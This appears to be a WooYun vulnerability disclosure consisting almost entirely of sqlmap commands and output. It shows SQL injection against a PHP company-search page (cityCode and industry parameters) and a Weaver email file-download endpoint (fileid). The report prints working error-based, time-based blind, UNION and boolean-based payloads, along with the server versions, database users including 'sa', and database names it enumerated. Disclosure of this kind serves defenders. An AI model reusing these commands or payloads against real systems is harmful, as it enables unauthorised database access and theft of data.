WooYun.org

sqlmap.py -u "http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2*" --random-agent --dbms=MySQL
参数 cityCode 可注入

Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971c
e458000f682fa47&func=search&catalog=0401&cityCode=2' AND (SELECT 3214 FROM(SELEC
T COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(3214=3214,1))),0x71766b7171,FLOOR(RA
ND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xxTE'='xxTE
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971c
e458000f682fa47&func=search&catalog=0401&cityCode=2' AND (SELECT * FROM (SELECT(
SLEEP(5)))Alit) AND 'nRcI'='nRcI
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://**.**.**.**:80/view/company.php?qState=af42a38e989e3971c
e458000f682fa47&func=search&catalog=0401&cityCode=-7300' UNION ALL SELECT CONCAT
(0x7171786b71,0x5757627458766a6a5a696b5456784d424853556b456968634f67726f7979636c
426e76657a415562,0x71766b7171)-- -
---
    the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0.0

http://**.**.**.**/view/company.php?qState=af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&cityCode=2&industry=160000*
参数 industry 可注入

Parameter: industry (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&c
ityCode=2&industry=160000' AND (SELECT 5023 FROM(SELECT COUNT(*),CONCAT(0x717670
7671,(SELECT (ELT(5023=5023,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATIO
N_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hZyG'='hZyG
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&c
ityCode=2&industry=160000' AND (SELECT * FROM (SELECT(SLEEP(5)))GvXD) AND 'IoVM'
='IoVM
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: qState =af42a38e989e3971ce458000f682fa47&func=search&catalog=0401&c
ityCode=2&industry=-8180' UNION ALL SELECT CONCAT(0x7176707671,0x466352525a63524
475506668414d6f43676c68536871437255544c445977776958704d6d676e4164,0x716a7a6a71)--

current user:    'gqmysql@localhost'
available databases [4]:
[*] guquan
[*] information_schema
[*] mysql
[*] test

sqlmap.py -u "http://**.**.**.**/weaver/weaver.email.FileDownloadLocation?fileid=10" --current-user
Parameter: fileid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fileid=10 AND 4637=4637
---
    the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
available databases [7]:
[*] ecology
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb